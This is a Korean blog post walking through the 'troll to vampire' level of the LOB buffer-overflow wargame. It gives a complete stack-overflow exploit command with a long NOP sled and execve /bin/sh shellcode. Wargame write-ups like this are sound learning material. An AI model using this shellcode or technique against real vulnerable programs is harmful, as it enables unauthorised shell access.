ANX1-Z3R0의 불안극복(不安克服)

010. troll to vampire | anxi0 본문

HACKING/[SYSTEM HACKING] LOB

010. troll to vampire | anxi0

ANX1Z3R0 2019. 2. 19. 16:05

troll to vampire,


바로 가보자.


ret 주소를 제한하네?

./(실행파일명) `python -c 'print "A"*44 + "BBBB"~~~~'` 에서


"BBBB" 부분이다.


저 자리가 \xff가 아니면 된다.


쉽군


nop sled를 더 길게 해준다. 그다음 ret 주소가 0xbfff....를 넘게 해준다.


<- ./vampire `python -c 'print "A"*44 + "\x20\x9d\xfe\xbf" + "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`


하면


쓱-싹


교훈

1. 하다보면 이해 잘 안되고, 너무 내용길어서 힘들 수 있지만, 차근차근 반복해서 보면 언젠가는 된다.

2. 몇 번 포기해도, 나처럼 갑자기 삘받는 시기가 온다.

3. 현타가 온다면 정상이다.

'HACKING > [SYSTEM HACKING] LOB' 카테고리의 다른 글

012. skeleton to golem | anxi0  (0) 2019.04.03
011. vampire to skeleton | anxi0  (0) 2019.03.21
009. orge to troll | anxi0  (0) 2019.02.19
008. darkelf to orge | anxi0  (0) 2019.02.18
007. wolfman to darkelf | anxi0  (0) 2019.02.17
Comments